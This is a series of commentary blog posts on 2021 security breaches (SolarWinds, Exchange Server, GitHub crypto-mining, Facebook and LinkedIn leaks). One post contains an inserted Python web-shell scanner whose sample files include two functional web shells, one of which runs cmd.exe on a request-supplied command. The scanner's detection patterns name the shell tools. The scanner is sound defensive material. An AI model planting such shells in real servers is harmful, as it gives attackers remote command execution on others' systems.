GitHub: Amusing Security Management
April 8, 2021
I got a kick out of “GitHub Investigating Crypto-Mining Campaign Abusing Its Server Infrastructure.” I am not sure if the write up is spot on, but it is entertaining to think about Microsoft’s security systems struggling to identify an unwanted service running in GitHub. The write up asserts:
Code-hosting service GitHub is actively investigating a series of attacks against its cloud infrastructure that allowed cybercriminals to implant and abuse the company’s servers for illicit crypto-mining operations…
In the wake of the SolarWinds’ and Exchange Server “missteps,” Microsoft has been making noises about the tough time it has dealing with bad actors. I think one MSFT big dog said there were 1,000 hackers attacking the company.
The main idea is that attackers allegedly mine cryptocurrency on GitHub’s own servers.
This is post SolarWinds and Exchange Server “missteps”, right?
What’s the problem with cyber security systems that monitor real-time threats and uncertified processes?
Oh, I forgot. These aggressively marketed cyber systems still don’t work it seems.
Stephen E Arnold, April 8, 2021
Facebook and Microsoft: Communing with the Spirit of Security
April 7, 2021
Two apparently unrelated actions by bad actors. Two paragons of user security. Two. Count ‘em.
The first incident is summarized in “Huge Facebook Leak That Contains Information about 500 Million People Came from Abuse of Contacts Tool, Company Says.” The main point is that flawed software and bad actors were responsible. But 500 million. Where is Alex Stamos when Facebook needs guru-grade security to zoom into a challenge?
The second incident is explained in “Half a Billion LinkedIn Users Have Scraped Data Sold Online.” Microsoft, the creator of the super useful Defender security system, owns LinkedIn. (How is that migration to Azure coming along?) Microsoft has been a very minor character in the great works of 2021. These are, of course, The Taming of SolarWinds and The Rape of Exchange Server.
Now what’s my point. I think when one adds 500 million and 500 million the result is a lot of people. Assume 25 percent overlap. Well, that’s still a lot of people’s information which has taken wing.
Indifference? Carelessness? Cluelessness? A lack of governance? I would suggest that a combination of charming personal characteristics makes those responsible individuals one can trust with sensitive information.
Yep, trust and credibility. Important.
Stephen E Arnold, April 7, 2021
DarkCyber for April 6, 2021, Now Available
April 6, 2021
DarkCyber is a twice-a-month video news program about the Dark Web, cyber crime, and lesser known Internet services. You can view the program at this link.
This program covers five stories:
- Banjo, founded by a controversial figure, has been given an overhaul. There’s new management and a new name. The challenge? Turn the off-tune Banjo into a sweet revenue song.
- The Dark Web is not a hotbed of innovation. In fact, it’s stagnant, and law enforcement has figured out its technology and is pursuing persons of interest. A “new” Dark Web-like datasphere is now emerging. Robust encrypted messaging apps allow bad actors to make deals, pay for goods and services, and locate fellow travelers more easily and quickly than ever before.
- User tracking is a generator of high value information. Some believe that user tracking is benign or nothing about which to worry. That’s not exactly the situation when third-party and primary data are gathered, cross-correlated, and analyzed. Finding an insider who can be compromised has never been easier.
- New cyber crime reports are flowing in the aftermath of the SolarWinds’ and Microsoft Exchange Server fiascos. What’s interesting is that two of these reports reveal information which provides useful insight into what the bad actors did to compromise thousands of systems.
- The final story reports on the world’s first drone which makes it possible for law enforcement and intelligence operatives to conduct a video conference with a bad actor near the drone. The innovative device can also smash through tempered glass to gather information about persons of interest.
DarkCyber is produced by Stephen E Arnold. The program is a production of Beyond Search and Arnold Information Technology. Mr. Arnold is the author of CyberOSINT and The Dark Web Notebook. He will be lecturing at the 2021 National Cyber Crime Conference.
Kenny Toth, April 6, 2021
Solarwinds: Making Security a Priority. After the Barn Burned and Running in the Crime Derby
March 31, 2021
I read a remarkable write up called “SolarWinds CEO Gives Chief Security Officer Authority and Air Cover to Make Software Security a Priority.” The article is notable for the information omitted. Here’s a passage I noted:
He created a cybersecurity committee for the board that includes him and two sitting board members. He also said that he has given the company’s chief security officer the power to stop any software release if necessary to address security concerns.
A security committee. Will the group produce a security solution which is elegant, effective, and able to restore trust?
The write up identifies the causes of security breaches. These are managerial missteps. Obviously SolarWinds believes a committee is the optimal way to deal with wonky management by those with an eye on the bottom line, bonuses, and a responsibility-free tenure as top dog.
The technical causes are not really causes. Sorry, but phishing is not a cause. Phishing is a method implemented because employees have inadequate training and the organizations employing these people drop the ball in setting up a defensible perimeter.
Why is this remarkable? Misdirection, blame shifting, and a belief a committee can overcome MBA thinking, compensation incentives, and what I call a high school science club sense of exceptionalism.
Stephen E Arnold, March 31, 2021
MSFT Exchange Excitement: Another Jolt of Info
March 30, 2021
I read “Exchange Server Attacks: Microsoft Shares Intelligence on Post-Compromise Activities.” Interesting. Weeks, maybe longer, have passed since what one of my analysts described as another digital Chernobyl, without much substantive information.
This “real” news story reports:
Microsoft is raising an alarm over potential follow-on attacks targeting already compromised Exchange servers, especially if the attackers used web shell scripts to gain persistence on the server, or where the attacker stole credentials during earlier attacks.
Interesting. A massive attack which may have distributed malware, possibly as yet undetected, poses a risk. That’s good to know.
This statement attributed to Microsoft is intriguing as well:
In a new blog post, Microsoft reiterated its warning that “patching a system does not necessarily remove the access of the attacker”.
Does this mean that Microsoft’s remediation is not fixing the “problem”? What sorts of malware could be lurking? Microsoft provides some measured answers to this particular question in “Analyzing Attacks Taking Advantage of the Exchange Server Vulnerabilities.”
But the problem is that Microsoft’s foundational software build and deploy business process seems to be insecure.
Dribs and drabs about the consequences of a major security breach are PR and hand waving, not the actions I craved.
Stephen E Arnold, March 30, 2021
Prodaft: Chasing the Bad Actors of SolarWinds
March 29, 2021
I read “Swiss Firm Says It Accessed SolarWinds Attackers’ Servers.” The idea is that the cyber security outfit explored the intermediary servers employed by the SolarWinds’ bad actors. The result was a successful penetration of some of these systems. The result? Prodaft, according to the report, has learned that “these attackers continue to target large corporations and public institutions worldwide.” The targets? The US and Europe.
Furthermore, the attackers have been given the handle “SilverFish Group.” One discovery is explained this way:
[The attackers have] designed an unprecedented malware detection sandbox formed by actual enterprise victims, which enables the adversaries to test their malicious payloads on actual live victim servers with different enterprise AV and EDR solutions, further expanding the high success rate of the SilverFish group attacks.
From my vantage point in rural Kentucky, this sounds similar to the methods revealed in the disclosure of the Hacking Team’s Remote Control System. The approach makes it possible to “spin” malware in a controlled manner across compromised systems.
The main point, despite the radio silence from certain organizations affected by the months-long attacks, is:
confirmation of the ongoing nature of the attack validates industry concerns. Once attackers establish persistence within an environment, it is difficult to remove them without considerable resources.
Interesting and not particularly reassuring.
Stephen E Arnold, March 29, 2021
The Value of Threat Data: An Interesting Viewpoint
March 29, 2021
Security is not job one in the cyber security business. Making sales and applying technology to offensive cyber actions are more important. Over the past couple of decades, security for users of mainstream enterprise applications and operating systems has been a puppet show. No one wants to make these digital ecosystems too secure; otherwise, it would be more difficult, expensive, and slow to compromise these systems when used by adversaries. This is a viewpoint not widely known by some professionals, even those in the cyber security business. Don’t agree? That’s okay with me. I would invite those who take exception to reflect on the failure of modern cyber security systems, including threat intelligence systems, to prevent the SolarWinds and Microsoft Exchange security breaches. Both are reasonably serious, and both illustrate the future of cyber operations for the foreseeable future. Just because the mainstream pundit-verse is not talking about these security breaches does not mean the problem is solved. It is not.
“Threat Data Helps Enterprises Strengthen Security” describes a different point of view. I am not confident that the data in the write up have factored in the very loud signals from the SolarWinds and Microsoft Exchange missteps. Maybe “collapses” is a more appropriate word.
The write up states:
Benefits of threat data feeds include: adding unique data to better inform security (71 percent), increasing preventive blocking to ensure better defense (63 percent), reducing the mean time to detect and remediate an attack (55 percent), and reducing the time spent researching false positives (51 percent). On the downside 56 percent of respondents also say threat feeds deliver data that is often too voluminous or complex to provide timely and actionable intelligence.
Let’s consider these statements.
First, with regard to benefits, knowing about what exactly? The cyber security defenses in place for the SolarWinds and Microsoft Exchange problems did zero to prevent the attacks. Victims are not 100 percent sure that recently “sanitized” systems are free from backdoors and malware. The fact that more than half of those in the survey believe that getting threat intelligence is good says more about the power of marketing and the need of cyber security professionals to do something to demonstrate to their superiors that they are on the ball. Yeah, reading about Fullz on the Dark Web may be good for a meeting with the boss, but it does and did zero for the recent, global security lapses. Organizations are in a state of engineered vulnerability, and threat intelligence is not going to address that simple fact.
Next, what about the information in the threat feeds? Like the headlines in a supermarket tabloid or a TikTok video, titillation snags attention. The problem, however, is that despite the high powered systems from developers from Herzliya to Mountain View, information flows generate a sense of false security.
A single person at FireEye noticed an anomaly. That single person poked around. What did that individual find? Something in a threat feed, a snappy graphic from a $100,000 visualization tool, or specific information about a malware attack? Nope, zippy items and factoids. Links to Dark Web sites add spice.
The write up says:
Each of the organizations surveyed faced an average of 28 cyber attacks in the past two years. On average, respondents say 38 percent of these attacks were not stopped because security teams lacked timely and actionable data. Respondents also report that 50 percent of all attacks can be stopped using timely and actionable intelligence.
SolarWinds went undetected for possibly longer than 18 months. Attacks one knows about are one thing. The painful reality of SolarWinds and Microsoft Exchange breaches are another. Marketing won’t make the reality different.
Stephen E Arnold, March 29, 2021
How about Those Cyber Security Awards? Great in the Wake of SolarWinds and the MSFT Exchange Issues
March 26, 2021
The Cyber Defense Awards, hosted by Cyber Defense Magazine, has released its list of “InfoSec Awards for 2020-Winners.” The introduction reads:
“These InfoSec Awards are in their 8th year and specifically focused on finding innovative infosec players who have a presence in the United States and other countries. With over 3,200 cybersecurity companies worldwide, only a small number – roughly 10% – are highlighted as InfoSec Awards 2020 winners, based upon independent judging and analysis. This year, we’ve continued to expand our coverage of some of our winning Women in Cybersecurity who will be rolled into our annual update, highlighting some of the innovative women helping take cybersecurity to new heights.”
It is nice that the awards are recognizing the contributions of women in the male dominated field, and the post presents us with an impressive list of companies. However, we note one name seems to be missing—FireEye, the firm whose smart human analyst (non AI infused) actually caught the widespread SolarWinds’ attack. After that debacle, the effects of which the cyber-security community is still unraveling, we wonder whether these awards are justified. Perhaps they should have taken the year off.
Be that as it may, those interested in the cyber security field may want to check out the full list. It and a description of the judges’ approach can be viewed at the link above.
Now the $64 question: How many of these “winners” detected the SolarWinds and Exchange breaches? Choose one: [a] None, [b] Zip, [c] Zero, [d] Nada.
Cynthia Murrell, March 26, 2021
Exchange Servers: Not Out of the Dog House Yet
March 25, 2021
Here’s a chilling statement I spotted in “Microsoft Servers Being Hacked Faster Than Anyone Can Count”:
This free-for-all [Exchange Server] attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic “script kiddies”… Because access is so easy, you can assume that the majority of these environments have been breached.
The statement is attributed to Antti Laatikainen, senior security consultant at the cyber security firm F-Secure.
Is this accurate?
The ever fascinating digital publication Windows Central ran a story with a headline that offers a different point of view: “Microsoft Says 92% of Exchange Servers Have Been Patched or Mitigated.”
The discussion about these different views raises a number of questions:
- Does Microsoft want to remediate its business processes to make its products and services more secure? (More security means more difficulties for certain government agencies who use security as a way to achieve their objectives.)
- Can security professionals be trusted to identify security problems or issues? (The SolarWinds’ misstep went undetected for months, maybe as much as two years before information about the issue surfaced in a FireEye statement.)
- Can continuous development and update processes deliver acceptable security? (The core business process may exponentially increase the attack surface with each fast cycle change and deployment.)
How secure are “patched” Exchange servers? A very good question indeed.
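The question left hanging by the March 30 post above (“patching a system does not necessarily remove the access of the attacker”) and by this one (how secure are “patched” Exchange servers) is the same: the patch closes the door the attacker came through, but a web shell dropped into an IIS content directory keeps working afterwards, so a post-patch sweep of those directories is the check an operator actually needs. The Python below is an added example of such a sweep. It is not Microsoft’s detection tooling and is not taken from any of the articles cited; the indicator regexes, the list of directories treated as suspicious, and the four sample files (with their names and contents) are all constructed here for illustration.

```python
"""
Post-patch web shell sweep for IIS / Exchange content directories.

Added example (not Microsoft's tooling): score .aspx/.ashx/.asmx files by
generic web-shell traits and by whether they sit in a directory that is a
common drop location. Indicator list, directory list and sample files are
constructed assumptions for this illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Generic server-side web shell traits. Heuristic, not an authoritative
# signature set: each entry is (name, pattern).
INDICATORS = [
    ("jscript-eval-of-request",       # eval(Request...)  classic one-liner
     re.compile(r'eval\s*\(\s*Request\s*[\.\[]', re.IGNORECASE)),
    ("dynamic-eval-unsafe",           # JScript eval(..., "unsafe")
     re.compile(r'eval\s*\([^)]*"unsafe"', re.IGNORECASE)),
    ("process-start",                 # spawning a child process
     re.compile(r'System\.Diagnostics\.Process|new\s+Process\s*\(|Process\.Start\s*\(',
                re.IGNORECASE)),
    ("cmd-or-powershell",             # interpreter names in page code
     re.compile(r'\b(cmd\.exe|powershell(\.exe)?)\b', re.IGNORECASE)),
    ("request-to-filesystem",         # writing request data to disk (uploader)
     re.compile(r'(File\.WriteAllText|File\.WriteAllBytes|SaveAs)\s*\(.*Request',
                re.IGNORECASE | re.DOTALL)),
    ("base64-to-code",                # decoding request data before use
     re.compile(r'FromBase64String\s*\(.*Request', re.IGNORECASE | re.DOTALL)),
    ("assembly-load",                 # loading arbitrary .NET code at runtime
     re.compile(r'Assembly\.Load\s*\(', re.IGNORECASE)),
]

# Directories under the Exchange front end / IIS root where dropped shells
# have commonly been found (assumed list; extend for your install).
SUSPECT_DIRS = ("/owa/auth/", "/ecp/auth/", "/aspnet_client/")
SCRIPT_EXTENSIONS = (".aspx", ".ashx", ".asmx")


@dataclass
class Finding:
    path: str
    indicators: List[str]
    in_suspect_dir: bool

    @property
    def score(self) -> int:
        # One point per content indicator, two more for a suspicious location.
        return len(self.indicators) + (2 if self.in_suspect_dir else 0)


def scan_content(text: str) -> List[str]:
    """Names of every indicator whose pattern matches the file content."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def in_suspect_dir(path: str) -> bool:
    normalised = path.replace("\\", "/").lower()
    return any(d in normalised for d in SUSPECT_DIRS)


def sweep(files: Dict[str, str], min_score: int = 1) -> List[Finding]:
    """Score every script file in `files` (path -> content) and return the
    ones with at least one content indicator, highest score first."""
    findings = []
    for path, content in files.items():
        if not path.lower().endswith(SCRIPT_EXTENSIONS):
            continue
        hits = scan_content(content)
        finding = Finding(path, hits, in_suspect_dir(path))
        # A clean file in a suspect directory is not a finding by itself.
        if hits and finding.score >= min_score:
            findings.append(finding)
    return sorted(findings, key=lambda f: -f.score)


# Constructed sample tree standing in for a walk of the real directories.
SAMPLE_TREE = {
    # Benign logon page: form markup, no dynamic code execution.
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page language="C#" %>\n<html><body><form id="logonForm" runat="server">'
        '<asp:TextBox id="username" runat="server" /></form></body></html>',
    # One-line JScript shell dropped next to the real auth pages.
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
    # C# shell under aspnet_client that runs a command taken from the request.
    r"C:\inetpub\wwwroot\aspnet_client\system_web\errorFF.aspx":
        '<%@ Page Language="C#" %><%@ Import Namespace="System.Diagnostics" %>\n'
        '<script runat="server">void Page_Load(object s, EventArgs e){'
        ' var p = new Process(); p.StartInfo.FileName = "cmd.exe";'
        ' p.StartInfo.Arguments = "/c " + Request["cmd"]; p.Start(); }</script>',
    # Ordinary page whose only "hit" is the word PowerShell in a comment.
    r"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\about.aspx":
        '<%@ Page language="C#" %><!-- see the PowerShell docs for remote management -->',
}


if __name__ == "__main__":
    for f in sweep(SAMPLE_TREE):
        print(f"score={f.score:<2} suspect_dir={f.in_suspect_dir!s:<5} "
              f"{f.path}  [{', '.join(f.indicators)}]")
```

Run against a real server, replace SAMPLE_TREE with a walk of the IIS root and the Exchange FrontEnd tree and read the ranking top-down: the two shells score 4, the page that merely mentions PowerShell in a comment scores 1 and sits at the bottom, and the clean logon page in a suspect directory is not reported at all. Content heuristics are only one leg of the check; comparing file hashes against a known-good install and listing script files whose creation time is after the date of the patch (or of the first exploitation) closes the gap this kind of pattern matching leaves.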
Stephen E Arnold, March 25, 2021
High Tech Tension: Sparks Visible, Escalation Likely
March 25, 2021
I read Google’s “Our Ongoing Commitment to Supporting Journalism.” The write up is interesting because it seems to be a dig at a couple of other technology giants. The bone of contention is news, specifically, indexing and displaying it.
The write up begins with a remarkable statement:
Google has always been committed to providing high-quality and relevant information, and to supporting the news publishers who help create it.
This is a sentence pregnant with baby Googzillas. Note the word “always.” I am not certain that Google is in the “always” business nor am I sure that the company had much commitment. As I recall, when Google News went live, it created some modest conversation. Then Google News was fenced out of the nuclear ad machinery. Over time, Google negotiated and kept on doing what feisty, mom and pop Silicon Valley companies do; namely, keep doing what they want and then ask for forgiveness.
Flash forward to Australia. That country wanted to get money in exchange for Australian news. Google made some growling noises, but in the end the company agreed to pay some money.
Facebook on the other hand resisted, turned off its service, and returned to the Australian negotiating table.
Where was Microsoft in this technical square dance?
Microsoft was a cheerleader for the forces of truth, justice, and the Microsoft way. This Google blog post strikes me as Google’s reminding Microsoft that Google wants to be the new Microsoft. Microsoft has not done itself any favors because the battle lines between these two giants are swathed in the cloud of business war.
Google has mobile devices. Microsoft has the enterprise. Google has the Chromebook. Microsoft has the Surface. And on it goes.
Now Microsoft is on the ropes: SolarWinds, the Exchange glitch, and wonky updates which have required the invention of KIR (Known Issue Rollback, a mechanism for backing out bad updates).
Microsoft may be a JEDI warrior with the feature-burdened Teams and the military’s go-to software PowerPoint. Google knows that every bump and scrape slows the reflexes of the Redmond giant.
Both mom and pop outfits are looking after each firm’s self interests. Fancy words and big ideas are window dressing.
Stephen E Arnold, March 25, 2021